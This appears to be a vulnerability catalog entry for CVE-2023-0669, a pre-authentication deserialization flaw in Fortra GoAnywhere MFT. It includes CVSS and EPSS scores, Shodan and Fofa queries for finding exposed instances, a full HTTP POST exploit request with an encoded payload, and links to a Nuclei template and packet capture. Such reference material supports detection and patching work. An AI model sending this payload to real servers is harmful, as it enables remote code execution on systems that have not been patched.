| Title | Fortra GoAnywhere MFT - Remote Code Execution |
|---|---|
| Author | rootxharsh,iamnoooob,dhiyaneshdk,pdresearch |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. |
| Remediation | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. |
| CVSS Score | 7.2 |
| EPSS Score | 0.94378 |
| CVE ID | CVE-2023-0669 |
| CWE ID | CWE-502 |
| Shodan Query | http.favicon.hash:1484947000http.favicon.hash:1484947000,1828756398,1170495932 |
| Fofa Query | app="goanywhere-mft"icon_hash=1484947000icon_hash=1484947000,1828756398,1170495932 |
| Tags | cve2023 cve rce goanywhere oast kev fortra vkev vuln |
Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet.
POST /goanywhere/lic/accept HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 473
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
bundle=bwSv9a5HlP8zbGJ%2BjIT2%2BjpC4tKUCCj9ce8awLxcjt1HLXC51PtoCaw4np6FXKOH7v5EZHjMUuiVUSQxpCYm5R5adQVi1StdMA4JbCzv5CFaLnTUNwwq4QweKYkyBS1wI%2Bbby7McUou9nJKVgh3aIqQ7g9SnTo2uXzeBgDx38A%2FxD4gwrK4VwnIoou9KKTURyQmFtagT42eAgLT3bsUgIHb1oc6IV2EnDMAAafshdoCYa2bn5QnVXMcQQM5HoLB1FavZ5i6d3lfpWAIf%2FlwS0pCL96Q8MiUlb5Z4OkzYqxOHiKOq7pmFJ4BIZ6Oimgkmw2kiLecqwNhT6LJYepfg%2B5lYAdJO2qjuE1ov01JbJRI1G9ocZpJ1SU3%2Fg49GCd8qhgF6U5YPLQVKa62EENAdao%2FnmfcQmcemQ0EoFGSwXYgIdFGt8H8D6Og2b0mFemIw$2
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-0669.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-0669.pcap
N/AN/A